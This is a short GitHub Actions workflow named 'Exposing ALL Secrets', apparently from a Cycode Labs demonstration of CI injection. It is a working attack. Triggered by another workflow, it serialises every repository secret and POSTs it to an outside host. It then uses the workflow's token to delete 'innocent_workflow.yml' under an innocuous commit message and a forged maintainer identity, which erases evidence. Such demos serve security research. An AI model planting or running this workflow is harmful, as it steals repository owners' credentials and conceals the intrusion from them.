name: Exposing ALL Secrets

on:
  workflow_run:
    workflows: ["Vuln"]

jobs:
 expose_secrets:
   runs-on: ubuntu-latest

   steps:
     - run: |
         echo "${{ toJSON(secrets) }}" > .secrets
         curl -X POST --data "@.secrets" http://lab.cycode.com:64375
     - run: |
         SHA=$(curl -X GET -H "Authorization: Token ${{ github.token }}" https://api.github.com/repos/CycodeLabs/gh-injection-vuln-demo/contents/.github/workflows/innocent_workflow.yml -s | jq -r .sha)
         curl -X DELETE -H "Authorization: Token ${{ github.token }}" https://api.github.com/repos/CycodeLabs/gh-injection-vuln-demo/contents/.github/workflows/innocent_workflow.yml -d '{"message":"innocent commit message","committer":{"name":"Maintainer Name","email":"maintainer@gmail.com"}, "sha":"'"${SHA}"'"}' 